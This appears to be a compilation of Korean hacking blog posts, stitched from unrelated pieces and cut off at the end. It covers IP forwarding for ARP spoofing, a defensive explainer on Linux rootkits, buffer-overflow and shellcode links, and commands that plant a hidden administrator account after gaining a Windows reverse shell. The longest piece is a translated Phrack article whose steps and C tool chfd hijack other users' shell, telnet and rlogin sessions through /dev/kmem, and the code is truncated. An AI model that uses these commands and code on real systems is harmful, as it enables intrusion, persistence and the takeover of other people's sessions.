root@Twelo.com

ARP SPOOFING공격을 하기 위해서 필수적으로 Packet Forwarding이 필요하다.

헌데 그동안 이 방법을 모르고 해매고 있었다 .. ㅠ

원래 내 계획은 Packet Forwarding해주는 프로그램을 따로 작성하려고 했는데

마침 지인께서 알려주었다 !! 간단하게 해주는 방법~!!

좌좌 .. 먼저 이 경로로 이동해 보자!!

이곳에 도착했으면 이제 ip_foward라는 파일이 있는데 이게 무엇으로 설정되어 있는지 보자..

아마 기본적으로는 0이라는 숫자 하나만 달랑 나올 것이다!

그렇다 기본적으로는 Packet Forwarding이 허용되지 않는다는 것이다!(ip를 사용한;;)

그렇다면 이제 이것을 1로 수정하자!!(루트 권한으로만;;)

그다음 iptables를 수정해

이러고 나면 자신에게 들어오는 패킷에 대해서 포워딩이 가능해진다

초보자를 위한 리눅스 루트킷(RootKits). 침입방지에서 제거까지 

소개(Introduction)

어느날 집에서 리눅스 유저 그룹으로부터 온 메일 리스트를 읽고 있는 중에, 도움을 요청하는 것을 발견했다. 그건 귀찮은 문제에 직면한 초보 리눅스 유저로부터 배달되어 온 것이었다. 리눅스 시스템에서 몇몇 루틴을 체크하던 중, 그는 유저 아이디 '0(즉 루트(root)-관리자)'로 등록된 한 명의 유저를 발견했다. 처음 든 생각은 그것이 루트킷(rootkit)일 수 있다는 것이었다. 그는 어떻게 그것이 정말 루트킷인지 검증할 수 있는지 알고 싶었고 시스템으로 부터 어떻게 제거하는지도 알고 싶었다. 그는 더 나아가 이런 종류의 공격이 다시 일어나지 않도록 보장하는 예방책을 알려줄 것을 요청했다. 이런 상황 때문에 나는 루트킷에 대한 이해와 루트킷이 끼치는 영향을 이해하기 위한 목적으로 이 보고서를 만들게 되었다. 또한 이 보고서에서는 루트킷을 모니터링하는 방법과 그것을 제거하는 절차에 대해서도 논의하고자 한다.

루트킷이란 무엇인가?

"http://www.whatis.com"에 따르면  "루트킷은 해커가 침입을 위장하기 위해 사용하여 한대의 컴퓨터 또는 일련의 컴퓨터 네트워크에 대한 관리자 접근권한을 획득하는 도구(프로그램)의 집합이다(역자주-앞에 게시한 루트킷(Rootkit) 참조). 루트킷은 일반적으로 리눅스, BSD, SunOS등 유닉스 운영체제 계열을 대상으로 만들어진다. 이 보고서는 리눅스 운영체제를 위해 만들어진 루트킷에 주안점을 둘 것이다. 기본적으로는 같은 기능을 수행하는 루트킷에는 많은 다른 버전들이 있다. 잘 알려진 리눅스 루트킷에는 LRK, tOrn, Adore등이 있고, 윈도우 루트킷에는 NTROOT, NTKap, Nullsys등이 있다. 이 루트킷의 파일 복사본과 관련된 세부 정보는 Packet Storm 사이트에서찾을 수 있다.

http://packetstormsecurity.nl/UNIX/penetration/rootkits/

루트킷은 공격자의 존재를 숨기기 위해 만들어질 뿐만 아니라, 미래의 관리자 레벨(루트)접근을 획득하기 위해 사용되기도 하며, DDoS(distributed denial of service)공격을 시작하거나, 또는 재정적인 정보 및 기밀정보를 습득하는데 사용되기도 한다. 루트킷은 공격자를 숨기기 위한 목적으로 만들었기 때문에, 루트킷이 어떤 기능을 갖고 있는지 이해할 필요가 있다. 루트킷이 설치될 때, ls,ps,netstat 같이 일상적으로 사용되는 많은 명령어들을 덮어쓴다. 이런 명령어들을 덮어씀으로써, 루트킷의 잠입을 관리자로부터 숨길 수 있다.

다음의 시나리오를 살펴보라 -

침임자는 패치되지 않은 애플리케이션에 대해 최근에 공표된 취약성을 통하여 이제 막 시스템에 접근하였다. 그러면, 침입자는 루트킷 설치프로그램을 기동한다. 이 루트킷은 'ls' 명령어를 막 덮어썼다. 이렇게 함으로써 어느 때든지 트로이목마화된(trojaned) 'ls' 명령어가 실행됨으로써 루트킷에 의해 설치된 모든 파일은 화면에 나타나지 않게 된다. 이 루트킷은 'ps'의 트로이목마화된 버전을 인스톨하기도 한하여 결국에는, 스니퍼(sniffer), 백도어(backdoor), 로그 파싱(parsing)프로세스 등도 화면에 보이지 않게 된다. 'ls' 와 'ps'명령어 만이 루트킷에 의해서 덮어쓰여질 수 있는 명령어는 아니다. 다음은 루트킷에 의해 덮어쓰여지는 일반적인 명령어들의 목록이다.

netstat: 현재 시스템에 연결되어 있는 네트워크 커넥션들, 라우팅 테이블(routing tables), 인터페이스 통계(interface statistics)에 관한 정보를 표시해 주기 위해 사용되는 유용한 툴. Netstat은 침입자에 의해서 시스템에 대한 내부로의 및 외부로의 연결을 숨기기 위해서 루트킷에 의해 수정된다.

du: 파일의 저장공간 사용율을 화면에 표시하기 위해 사용되는 명령어이다. 'ls' 명령어와 매우 유사한 이 'du'는 계층적 디렉토리 구조를 보여준다. 또한 각각의 파일 또는 이렉토리가 얼마나 많은 디스크 공간을 사용하는지 보여준다. du는 루트킷에의해 설치된 파일과 디렉토리를 숨기기 위해 주로 트로이목마화 된다.

find: 디렉토리 계층그조 하에서 파일들을 찾기위해 사용된다. find 명령어를 변형시킴으로써 침입자는 루트킷에 의해 설치된 이미 알려진 파일을 관리자가 찾기 어렵게 만든다. 'ls','du' 와 같이 find는 루트킷 관련 파일의 존재를 숨기기 위해 트로이목마화 된다.

ifconfig: 네트워크 인터페이스 관련사항을 설정하고 화면에 표시하기 위해 사용. 스니퍼(sniffer)가 설치되서 실행되면, 네트워크 인터페이스는  promiscuous 모드에 위치하게 된다. 인터페이스를 'Promiscuous mode'로 설정하는 것은 네트워크 인터페이스로 하여금 네트워크 상에 있는 패킷을 가로채서 읽을 수 있도록 하는 것이다. ifconfig는 인터페이스가 'promiscusous mode'상태에 있다는 것을 감춤으로써 스니퍼(sniffer)또는 패스워드 수집기(password grabber)의 존재를 숨기는 기능을 하도록 변형된다.

inetd (xinetd): 인터넷 서비스를 제공하는 프로그램을 시작시키기 위해 설계된 '슈퍼서버'

(x)inetd는 그때 그때 적절한 서버를 생성시켜 서비스 연결 요청을 받아들인다. 많은 루트킷은 어떤 한 특정한 포트에 접근되었을 때, 루트킷 서비스를 실행시키도록 환경설정 파일에 자신들의 애플리케이션을 첨부한다.

killall: 프로세스를 중단시키는 명령어. Killall은 대부분 루트킷에서 트로이목마화 됨으로써 관리자가 루트킷이 설치한 특정한 프로세스를 중단할 수 없게 된다.

login: 시스템에 접속인증시 사용되는 데몬. 로그인 데몬(daemon)은 모든 사용자 이름 및 패스워드를 기록하기 위해 수정된다. 이 기록된 리스트는 추후 사용을 위해 디렉토리에 저장될 수 있고, 또는 다른 시스템에 전송될 수도 있으며, 채팅서버나 뉴스그룹 같은 대체 시스템에 표시될 수도 있다.

lsof: 열려있는 파일들을 목록화하기 위해 사용되는 명령어. 'lsof'는 루트킷에 의해 열린 파일이나 프로세스를 숨기기 위해 덮여쓰기 된다.

모든 루트킷이 명령어를 덮어쓰기 하는 것은 아니다. Adore Knark같은 루트킷은 임시로 로딩가능한 커널 모듈(loadable kernel modules:LKM)로서 만들어진다. LKM루트킷은 시스템 호출(system call)을 이용하여 실질적으로 명령어를 수정할 필요없이 명령어의 행위를 변경한다.

일반인들은 시스템 호출을 "사용자 레벨 애플리케이션이 운영체제에 애플리케이션을 위한 어떤 기능을 수행하도록 요구하는 방법"라고 정의한다. 시스템 호출 테이블에는 각 시스템 호출 목록이 들어있다.

루트킷은 자신의 존재를 숨기도록 만들어졌기 때문에, 어떤 명령어가 어떤 루트킷에 영향을 받았더라도 그 이전과 동일하게 기능해야만 한다.

** 오늘의 용어설명 **

Sniffer & Promiscuous Mode(전자상거래 혁명-최인영, 동일출판사)

스니퍼는 네트워크의 한 호스트에서 실행되어 그 주위를 지나다니는 패킷들을 엿보는 프로그램으로서 계정과 패스워드를 알아내기 위해서 침입자들에 의해 자주 사용되는데 아무리 네트워크 보안에 신경을 쓴 호스트라도 주변의 호스트가 공격당해서 스니핑을 위해 사용된다면 무력해질 수 밖에 없다. 즉, 나의 컴퓨터와 연결된 호스트 중 하나에 해커가 침입하여 스니퍼를 설치하게 되면 나의 호스트로 접근하는 루트 패스워드를 가로채어 알아낼 수 있게 되며 같은 방법으로 인접해 있는 호스트들은 모두 스니핑을 당하게 된다. 스니퍼는 이더넷의 설계상 약점에 의해 발생하는 기술로 원리를 알아보면 다음과 같다.

가장 일반적인 LAN의 구성 방법은 이더넷을 사용하는 것으로 주변에서 가장 쉽게 접하는 경우이다. 이더넷을 통한 통신방법은 매우 간단하다. A라는 호스트가 B라는 호스트로 패킷을 보내고 싶다면 호스트 A는 B와의 배타적인 연결을 통하는 것이 아니라 그 패킷을 이더넷에 뿌린다. 그리고 그 패킷은 일반적으로 수신 주소의 호스트만이 받도록 기대된다. 그러나 그것은 기대 사항일 뿐 언제라도 깨어질 위험 부담을 안고 있는 프로토콜이다. 네트워크 디바이스는 자신에게 오지 않고 다른
호스트를 향해 지나가는 패킷까지 받는 상태에 들어갈 수 있는데, 그 때를 'Promiscuous Mode'라고 부른다.
스니퍼는 바로 그 상태에서 동작한다. 이렇게 네트워크의 설계상에 커다른 약점이 있기 때문에 스니퍼에 의한 공격은 치명적이며 일부 OS를 제외하고는 찾아내기가 곤란한 경우가 많고 이를 막기 위해 많은 부담이 따른다. 게다가 스니퍼의 핵심을 이루는 코드는 대부분의 OS에서 독립된 프로토콜로서 지원을 하는데 SunOS의 NIT, IRIX의 SNOOP이 좋은 예이다. 잘만 이용하면 침입자들을 상대하는 관리자들에게 큰 무기가 될 수 있다. 즉, 네트워크를 감시하여 해커를 잡는 데 사용할 수 도 있다. 예를 들면 netlog라는 좋은 툴이 이미 있다.

(ftp://ftp.cert-kr.or.kr/pub/tools/etc/netlog/netlog -1.2.tar.gz)은 telnet과 ftp모듈이 제외되어 있는 것이 이툴의 성격을 잘 말해 주고 잇다. 패스워드 스니핑에 사용되는 것을 막기 위함일 것이다.
스니퍼는 일반적으로 다음과 같은 일련의 동작을 하는 코드로 구성된다.
1. 네트워크 디바이스를 열어서 "Promiscuous Mode"로 만든다.
2. 지나가는 모든 패킷을 읽는다.
3. 패킷을 필터링해서 발신 및 수신 주소, 서비스(telnet, rlogin, ftp, smtp등), 그리고 계정과 패스워드가 포함된 데이터를 구분해서 출력한다.

inetd(원영식,FreeBSD user group)

inetd는 super daemon이라고 합니다.
즉 여러 서버 프로그램들을 관리하는 서버 프로그램이라고 할까요...  inetd는 메모리에 항상 떠 있으면서 클라이언트에서 요청이 있을 때마다  그에 적절한 서버 프로그램을 찾아서 실행시켜 주는 것입니다. 필요한 설정은 /etc/services와 /etc/inetd.conf 두 파일에 들어 있습니다. services는 서비스와 포트 번호를 설정하는 것이고, inetd.conf는 서비스와 해당 서버 프로그램을 설정하는 것입니다.
ftp를 inetd와 standalone 두 가지로 모드로 한다는 것은 말 그대로 ftp 서버를 inetd 관리 하에 둘 것인가, 아니면 inet와 관계 없이 독립적으로 실행할 것인가를 결정하는 것입니다. inet 모드로 운영하면 클라이언트로부터 요청이 있을 때마다(ftp 접속 요청이 있을 때마다) inet가 ftp 서버 프로그램을 찾아서 실행시켜 주고, ftp 접속이 끊어지면 다시 실행을 중단시킵니다. standalone 모드라면 부팅 후 항상 ftp 서버가 메모리에 상주하며 ftp 접속 요청이 생기면 직접 ftp 서비스를 시작합니다.

inet 모드의 장점은 쓸데없이 메모리를 잡아먹지 않아도 된다는 점이구요, standalone은 빠르다는 점입니다. 일반적으로 접속요구가 빈번한 웹서버는 standalone으로, 나머지 서비스는 inetd모드로 설정해 놓더군요.

DAEMON(정보통신용어사전)

컴퓨터 시스템의 운영에 관련된 작업을 후선(background) 상태로 동작하면서 실행하는 프로그램.
처리해야 할 작업 조건이 발생하면 자동으로 기동하여 필요한 작업을 실행한다. 예를 들면, 인터넷 웹 서비스를 제공하는 주 컴퓨터 시스템에서 웹 서버는 후선 상태로 동작하고 있다가 통신망상의 웹 브라우저로부터 자료 요청이 있으면 작업을 실행한다. 

LKM(en.wikipedia.org/wiki/LKM)

Linux Loadable Kernel Modules, or LKM, are object files that contain code to extend the running kernel, or so-called base kernel. They are typically used to add support for new hardware, filesystems or for adding system calls. When the functionality provided by a LKM is no longer required, it can be unloaded, freeing memory.

리눅스 로더블 커널 모듈(Linux Loadable Kernel Modules), LKM은 소위 베이스 커널(base kernel)이라고 불리는 구동 커널을 확장하기 위한 코드를 포함한 객체 파일이다. 새로운 하드웨어나 파일시스템 또는 추가된 시스템 콜(system call)을 추가적으로 지원하기 위해 사용된다. LKM에 의해 제공되는 기능의 더이상 필요하지 않을 때, 언로드(unload)되고 메모리를 해제한다.

BUFFER OVERFLOWS

• White Papers
  • Smashing the stack for fun and profit or Hangul Translation Version by jykim@hackerslab.com
  • How to write buffer overflows or here
    
  • Advanced buffer overflow exploit or here
    
  • Buffer overflow exploit in the alpha linux or here
    
  • Writing buffer overflow exploits - a tutorial for beginners or here
    
  • Buffer overwrites
    
  • w00w00 on Heap Overflows or here
    
  • How 'buffer overflow' attacks
    
  • WindowNT Buffer Overflow's From Start to Finish" or here
    
  • m68k buffer overflows or here
    
  • Win32 Buffer Overflows
    
  • Stack Smashing Vulnerabilities in the UNIX Operationg System
  • djgpp Inline Assembly Guide
    
  • Startup state of Linux/i386 ELF binary
    
  • Self modifying code under Linux
    
  • Using the framebuffer device under Linux
    
  • Using the audio device under Linux
    
  • Using the raw keyboard mode under Linux
    
  • Using mode X via direct VGA access under Linux
    
  • The Art of Assembly Language Programming or here
    
  • Frame Pointer Overwrites - One-byte Buffer Overflow

• Sources
  • Shellcode - aix | bsdi | dg-ux | freebsd | hp-ux | linux-sparc | linux-x86 | netbsd | openbsd | openserver | ppc-bsd | ppc-linux | solaris-sparc | solaris-x86 | unixware | win32

• Tools
  • Shellcode Generator for linux-x86
  • Finding the Buffer Overflow Vulnerabilities

윈도우는 유닉스나 리눅스의 터미널에서 처럼 프롬프트에서 사용자 관리가 가능하다.

이점이 윈도우 리버스 쉘에 성공했을 때에 시스템에 더 큰 피해를 줄 수 있다.

왜냐면 프롬프트에서 임의의 사용자를 추가시키고 그 사용자의 로컬그룹을 administrator로

바꿀 수 있기 때문이다. 보통 리버스 쉘은 쉘의 유저의 비밀번호를 모르는 상태에서 얻어지기 때문에

이러한 방법은 시스템 공격을 우회하기 좋은 방법이 된다.

테스트해본 환경은 윈도우XP이고 윈도우 서버에서는 해보지 않았다.

보통 리버스 쉘은 웹 취약점이나 서비스 취약점으로 이루어 지는데 서비스가 administrator권한으로

작동중이었다면 획득한 프롬프트 또한 administrator 권한의 프롬프트 일 것이다.

먼저 위 스크린샷 처럼 임의의 호스트를 공격해서 리버스 쉘 획득에 성공했다고 가정한 상태에서

시작해 보자.

여기서 'net user'라는 명령어를 사용하면 위 스크린샷 처럼 현재 시스템에 등록되어 있는

사용자를 보여준다.

'net user /add USER PASSWORD' 명령은 사용자를 시스템에 등록해준다.

예제로 bin00pang의 비밀번호를 사용하는 hacker라는 사용자를 등록하였다.

그리고 'net localgroup administrators hacker /add'를 사용해서 hacker 사용자를

관리자 그룹으로 옮겨준다.

윈도우는 기본정책으로 관리자가 아니면 원격제어를 제한한다. 따라서 사용자를 관리자 그룹으로

만들어 주는 것이다.

비교를 위해서 사용자를 하나 더 추가시키고 관리자 그룹으로 이동시키지 않았다.

먼저 두 번째 만든 사용자인 bin00pang을 사용해서 원격접속을 시도하였다.

위 스크린샷에서 보는것 처럼 정책에 따라서 로그온할 수 없다는 메세지가 뜬다.

그러나 관리자 그룹으로 이동시킨 사용자는 위 스크린샷 처럼 원격 로그인이 된다.

고유의 사용자를 만든 것이므로 사용자를 위한 여러 개인설정을 만든다.

로그인이 끝나고 제어판의 사용자를 확인하면 위와같이 방그 만든 사용자들이 등록되어 있다.

처음 만든 hacker는 컴퓨터 관리자로 등록이 되어 있고 bin00pang은 제한된 계정으로

등록이 되어있다.

-스크랩후 망상-

무엇보다 윈도우 쉘을 따는 게 중요하다... 일단 쉘을 따고나서 위의것들을 따라해보자..

쉘을 따기위해선...리버스 텔넷, RMOF, 음 머가 있지? 누가좀 가르쳐줘!!

Procrastination is the denial of death. 

Lift with your leg, not your back. 

원본 소개  

Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 05 of 17  File Descriptor Hijacking 

orabidoo <odar@pobox.com> 

소개 

우리는 종종 사용자의 권한을 넘어 root를 얻는 방법에 대한 tty hijacking에 대해 

듣곤한다. 이것을 위한 Sys V의 스트림(STREAMS)을 사용한 전통적인 툴과 리눅스에서 

loadable module을 사용하기위한 방법으로 본지의 50호에 특별히 소개된적이 있었다. 

나는 remote 또는 local머신의 루트를 얻는 간단한 테크닉을 소개하고자 한다. 리눅스와 

FreeBSD를 사용했다. : root가 kernel memory에 쓸수 있는 유닉스 비슷한 시스템이라면 

어디서나 가능하다. 

아이디어는 간단하다. :커널의 fd table을 약간 꼬아서, 하나의 프로세스에서 다른 프로세스로

fd를 강제적으로 옮기는 것이다. 

이방법은 당신이 할수 있는 거의 모든일을 가능하게 한다. : 실행되고있는 커맨드의 output을 

파일로 리다이렉션 시킨다든지, 당신의 이웃의 텔넷 커넥션에서 까지도 가능하다. 

커널은 어떻게 열린 fd의 track을 지키는가. 

유닉스에서, 프로세스가 fd로 이루어진 자원에 접근하는 방법은 open(),socket(),pipe() 

들과 같은 시스템 콜로서 가능하다. 프로세스의 관점에서 보면 , fd는 리소스에 대한 

불투명한 핸들이다. fd의 0,1,2는 각각 표준 입력, 출력, 에러를 나타낸다. 새로운 

descriptor는 항상 시퀀스에 올로케이트 되어있다. 

펜스(fense)의 다른면에서, 커널이 지키고, 서로다른 프로세스간에 fd table은 각 fd 

structure로의 포인터로 이루어진다. fd가 열려있지 않으면 포인터는 NULL이다. 반면에, 

structure는 fd자체에 대한 종류(file, socket, pipe, etc...)에 대한 정보를 가지고 

있으며, fd access에 대한 자원(파일의 inode, 소켓의 주소와 상태정보 등등..)의 데이터에 

대한 포인터를 함께 가지고 있다. 

보통 프로세스 테이블은 링크된 스트럭쳐의 리스트 또는 배열(array)로 구성되어있다. 주어진 

프로세스를 위한 스트럭쳐에서부터, 당신은 그 프로세스에 대한 내부의 fd테이블을 손쉽게 

찾을수 있을 것이다. 

리눅스에서, 프로세스 테이블은 task_struct의 구조체 배열("task"로 불려지는)이며, 구조체 

files_struct로의 fd배열을 가진(/usr/include/linux/sched.h 참조) 포인터를 포함하고 

있다. SunOS 4에서 프로세스 테이블은 fd들에 대한 정보를 가지고 있는 u_area로의 포인터를

포함한 스트럭트 proc's의 링크드 리스트이다. FreeBSD에서 역시 allproc라 불리는 스트럭트 

proc's의 링크드 리스트이며, 그것은 fd테이블을 포함한 구조체 filedesc로의 포인터를 가진다.

(/usr/include/sys/proc.h 참조) 

만약 당신이 커널 메모리에 쓰기 또는 읽기 access를 가지고 있다면(대부분 이것은 /dev/kmem

을 읽거나 쓰는것과 같다.) fd테이블들의 잡탕속에서 열려진 fd를 프로세스에서 훔치는 것과, 

다른 프로세스에서 재사용하는것을 방해할것은 아무것도 없다. 

이것은 보안레벨 0등급이상에서 돌아가는 BSD4.4({Free,Net,Open}BSD)와 같은 시스템에서는

동작하지 않는다. 저런 모드에서는 /dev/kmem, /dev/mem과 같은 곳으로의 접근이 불가능하다.

그러나 많은 BSD시스템들은 약점이 있는 보안등급 -1에서 동작하며, StartUP스크립트를 

조작하여 다음번 재부팅때 보안등급을 -1로 끌어내리는것도 가능할 수 있다. FreeBSD에서는 

"sysct | kern.securelevel"명령어로 보안등급을 확인할수 있다. 리눅스역시 보안등급을 

가지고는 있지만, 리눅스는 /dev/kmem으로의 접근을 방해하지는 않을 것이다. 

File descriptor Hijacking 

커널 내부의 변수들은 사용자 프로그램에 의해 수정될 수 없다. 

첫째로, 멀티 태스킹 시스템에서 당신은 변수의 주소를 찾아내고, 그 값을 바꾸는 사이에 

커널의 상태가 바뀌지 않는데 대한 아무런 잇점(guarantee)이 없다. 이것은 우리가 왜 이 

기술을 확실성에 목적을 둔 프로그램들에서 사용되어 질 수 없는지를 보여준다. 말했듯이,

연습에서 난 실패한적이 없다. 왜냐하면 커널은 한번 할당되어진 (최소한 처음 20,32,64... 

프로세스당 fd) 이러한 종류의 데이터를 옮기지 않으며, 프로세스가 닫히거나 새로 fd를 

만들어 열때 시도하는것은 거의 불가능하다. 

First of all, on a multitasking system, you have no guarantee that the 

kernel's state won't have changed between the time you find out a 

variable's address and the time you write to it (no atomicity). This is 

why these techniques shouldn't be used in any program that aims for 

reliability. That being said, in practice, I haven't seen it fail, because 

the kernel doesn't move this kind of data around once it has allocated it 

(at least for the first 20 or 32 or 64 or so fds per process), and because 

it's quite unlikely that you'll do this just when the process is closing or 

opening a new fd. ---- 아리송해서 원문도 같이 붙여봅니당. ^^;; 

You still want to try it? 

단순한 목적을 위해, 우리는 두 프로세스간의 fd복제 또는 한 프로세스에서 다른 프로세스로 

리턴값이 없는 프로세스로의 fd passing을 시도하지는 않을 것이다. 

대신, 우리는 프로세스의 fd를 다른 프로세스의 fd와 교환할것이다. 이 방법은 우리가 

열려진 파일과 거래할수 있는 유일한 방법이며, 카운트 참조와 같은 방법은 사용하지 않을 

것이다. 이것은 가능한 한 간단하게 커널안에서 두개의 포인터를 찾아내고, 그것들을 

교환할 것이다. 약간 더 복잡한 버젼은 fd에 대한 3개의 포로세스와 원형순열(교환)을 

포함한다. 

당연히, 당신은 바꾸고자하는 fd에 일치할만한 리소스를 추측해서 알아내야만 한다. 실행되고 

있는 쉘의 완벽한 제어를 위해 당신은 표준입력, 출력, 에러를 원할것이며, 또 0,1,2로 불리는 

이 세가지 fd들을 취해야 할 필요가 있다.할 필요가 있다. 또, 당신은 텔넷 세션을 제어하기 

위해 텔넷이 인터넷의 다른 쪽과 대화하기위해 사용하는 inet socket의 fd를(주로 3) 

원할 것이며, 동작하는 다른 텔넷과 fd를 교환 할 것이다. 리눅스에서는 /proc/[pid]/fd 

에서 프로세스가 사용하는 fd를 얻을수 있다. 

Using chfd 

우리는 마무리를 위한 도구로서 linux와 FreeBSD를 가지고 있다. 그것은 공평하게 다른 

시스템으로 t쉽게 옮겨(포팅되어) 질 수 있다. 

리눅스에서 chfd를 컴파일 하기 위해서는 리눅스 커널의 동작에 대해 몇가지 이해해야 

할것들이 있다. 만약 1.2.13이나 그 비슷한 것이라면, /* #define OLDLINUX */의 주석을 

지워야 할 필요가 있는데, 왜냐하면 커널의 구조가 그때 부터 바뀌었기 때문이다. 만약 2.0.0 

이나 그 이상이라면 다시 바뀔 수 있을 지라도 box의 바깥쪽에서도 동작할것이다. 

그리고 커널에서 심볼테이블을 찾아야 할 필요가 있는데, 그것은 아마 /boot/System.map또는 

그 비슷한데 있을 것이다. 이것은 실제 동작하고 있는 커널에 대해 일치한다는것을 확인해야 

한다.

그리고 "take" 심볼의 주소를 뒤져봐야 할것이다. 이 값을 "00192d28"대신에 chfd에 넣어 

주어야 한다. 그리고 "gcc chfd.c -o chfd"명령과 함께 컴파일 해라. 

FreeBSD에서 컴파일 하기 위해서는 단지 FreeBSD 코드를 얻은후에 

"gcc chfd.c. -o chfd -lkvm"명령과 함께 컴파일 하면 된다. 이 코드는 FreeBSD 2.2.1 

에서 작성 되었으며, 다른 버젼을 위해 좀 만져줘야 할 수도 있다. 

컴파일 된후에, chfd를 다음과 같이 실행한다. 

chfd pid1 fd1 pid2 fd2 

또는, 

chfd pid1 fd1 pid2 fd2 pid3 fd3 

첫번째 경우, fd는 단지 교환(swap)되었을 뿐이다. 두번째는 두번째 프로세스가 첫번째의 

fd를 얻고, 세번째(프로세스)가 두번째의 fd를 얻으며, 첫번째가 세번째의 fd를 얻어낸다.

특별한 경우로, pid중의 하나가 0일 경우에 일치하는 fd가 버려지며, 그것 대신 /dev/null 

값이 fd에 pass된다. 

Example 1  

. pid 207 이 긴 계산을 하며, tty로 output 되는 경우. 

. 당신이 "cat > somefile"을 실행시키고, 그것의 pid를 조사 했을 경우(1746) 

그렇다면 

chfd 207 1 1746 1 

이것은 그 계산을 "somefile"이란 파일로 리다이렉션 시킬것이며, 그 계산이 돌아가고있는 

tty를 화면에 출력할 것이다. 그러면 ^C로 화면에 출력되는 중요한 계산의 결과값에대한 

두려움 없이 실행을 중지할수 있다. 

Example 2 

. 누군가 tty에서 bash의 복사본을 pid 4022로 돌리고 있을때. 

. 당신이 tty에서 bash의 또다른 복사본을 pid 4121로 돌리고 있을때. 

그러면 

sleep 10000 

# 당신의 bash에서 실행하면 당분간 tty에서 읽지 않을 것이다. 

# 그렇지 않으면 당신의 쉘은 /dev/null 로부터 EOF를 취한후에 죽을 것이다. 

# 그 세션은 즉시, 

chfd 4022 0 0 0 4121 0 

chfd 4022 1 0 0 4121 1 

chfd 4022 2 0 0 4121 2 

그리고 다른사람의 키 입력을 /dev/null로 보내는 동안에 bash와 output의 제어를 찾아라.

당신이 쉘을 떠날때, 그는 그의 세션이 연결종료 됬다는것을 알아내고, 당신은 ^C로 당신의 

sleep를 죽이면 안전해 질수 있다. 

다른 쉘들은 아마 다른 fd를 사용할 것이다. zsh는 tty로 부터 읽어 들일때 fd 10을 

사용하는것 같은데, 그에 따라 직접 바꿔 줄 필요가 있을 것이다. 

Example 3 

. 누군가 pid 6309로 tty에서 텔넷을 실행 시키고 있을때. 

. 당신이 pid 7081로 텔넷을 중요하지 않은 포트로 너무 빨리 드롭 되지 않도록 실행 시킬때.

(telnet localhost 7, telnet www.yourdomain 80, 기타 등등) 

. 리눅스에서, 빠르게 /proc/6309/fd 와 /proc/7081/fd 를 살펴보면 텔넷이 사용하고 있는 

fd 0, 1,2,3( 3은 분명 그 커넥션일 것이다.)를 알수 있을 것이다. 

그러면 

chfd 6309 3 7081 3 0 0 

이것은 그 다른 사람의 텔넷 커넥션을 /dev/null 로 보낼것이다. (다른 사용자의 텔넷은 EOF를 

읽어 "Connection closed by foreign host."라는 메세지를 볼것이다.) 그리고 당신의 

텔넷은 스스로 그 다른 사용자의 리모트 호스트에 연결될 것이다. 이 시점에서 당신의 텔넷이 

연결 위치에 echo를 멈추도록 하기 위해 당신은 아마도 ^]를 누르고 "mode character"를 

칠것이다. 

Example 4 

. 누군가 tty에서 rlogin를 돌리고 있을 경우. " 각자의 rlogin이 pid 4547과 4548를 

  쓰고 있을때. 

. 당신은 다른 tty에서 pid 4852와 pid 4855로 rlogin localhost 을 돌리고, 

. /proc/../fds 와 관련된 것들을 빠르게 살펴봄으로서 rlogin 프로세스가 커넥션을 위해 

  fd 3을 쓰고 있다는것을 알아 냈을때. 

그렇다면, 

chfd 4547 3 4852 3 (원문에서는 이부분이 chfd 4547 3 4552 3) 

chfd 4548 3 4855 3 (역시 chfd 4548 3 4555 3) 

당신의 rlogin이 일어날수 없는 이벤트(localhost로부터 데이터를 읽는것)를 기다리는 

것때문에 커널에 의해 당신의 rlogin이 아직 막혀 있는 경우를 제외하고 이것은 당신이 

기대한대로 동작할 것이다. 이러한 경우, 'fg'에 따라 kill -STOP을 실행 시킴으로서 

다시 rlogin을 깨울수 있다. 

당신은 아이디어를 얻었다. 프로그램이 다른 프로그램의 fd를 얻는 동안 그것을 가지고 

무엇을 해야할지 아는것은 중요하다. 대부분의 경우 당신은 같은 프로그램의 복사본을 

실행시키는 것으로 ,만약 /dev/null, stdin/stdout/stderr로 fd를 패스 하지 

않는한, 당신이 원하는것을 얻을수 있을 것이다. 

Conclusion 

당신도 보았듯이, 이걸 가지고 꽤 무서운 짓을 할수 있다. 그리고 루트가 이것을 돌리는 

것으로 부터 당신 자신을 보호하는 것 또한 정말 어렵다. 

이것은 보안 구멍 조차 아니라는 점에서 논의 될수있다. 이 짓들이 가능하기 위해선 

루트가 *필요*하다. 반면에 /dev/kmem의 드라이버 코드 안에 당신이 /dev/kmem에 

쓰도록(write) 할 수 있는 명백한 코드는 없을것이다. 그렇지 않은가? 

The Linux code 

<++> fd_hijack/chfd-linux.c 

/* chfd - exchange fd's between 2 or 3 running processes. 

* 

* This was written for Linux/intel and is *very* system-specific. 

* Needs read/write access to /dev/kmem; setgid kmem is usually enough. 

* 

* Use: chfd pid1 fd1 pid2 fd2 [pid3 fd3] 

* 

* With two sets of arguments, exchanges a couple of fd between the 

* two processes. 

* With three sets, the second process gets the first's fd, the third gets 

* the second's fd, and the first gets the third's fd. 

* 

* Note that this is inherently unsafe, since we're messing with kernel 

* variables while the kernel itself might be changing them. It works 

* in practice, but no self-respecting program would want to do this. 

* 

* Written by: orabidoo <odar@pobox.com> 

* First version: 14 Feb 96 

* This version: 2 May 97 

*/ 

#include <stdio.h> 

#include <unistd.h> 

#include <fcntl.h> 

#define __KERNEL__ /* needed to access kernel-only definitions */ 

#include <linux/sched.h> 

/* #define OLDLINUX */ /* uncomment this if you're using Linux 1.x; 

tested only on 1.2.13 */ 

#define TASK 0x00192d28 /* change this! look at the system map, 

usually /boot/System.map, for the address 

of the "task" symbol */ 

#ifdef OLDLINUX 

# define FD0 ((char *)&ts.files->fd[0] - (char *)&ts) 

# define AD(fd) (taskp + FD0 + 4*(fd)) 

#else 

# define FILES ((char *)&ts.files - (char *)&ts) 

# define FD0 ((char *)&fs.fd[0] - (char *)&fs) 

# define AD(fd) (readvalz(taskp + FILES) + FD0 + 4*(fd)) 

#endif 

int kfd; 

struct task_struct ts; 

struct files_struct fs; 

int taskp; 

int readval(int ad) { 

int val, r; 

if (lseek(kfd, ad, SEEK_SET) < 0) 

perror("lseek"), exit(1); 

if ((r = read(kfd, &val, 4)) != 4) { 

if (r < 0) 

perror("read"); 

else fprintf(stderr, "Error reading...\n"); 

exit(1); 

} 

return val; 

} 

int readvalz(int ad) { 

int r = readval(ad); 

if (r == 0) 

fprintf(stderr, "NULL pointer found (fd not open?)\n"), exit(1); 

return r; 

} 

void writeval(int ad, int val) { 

int w; 

if (lseek(kfd, ad, SEEK_SET) < 0) 

perror("lseek"), exit(1); 

if ((w = write(kfd, &val, 4)) != 4) { 

if (w < 0) 

perror("write"); 

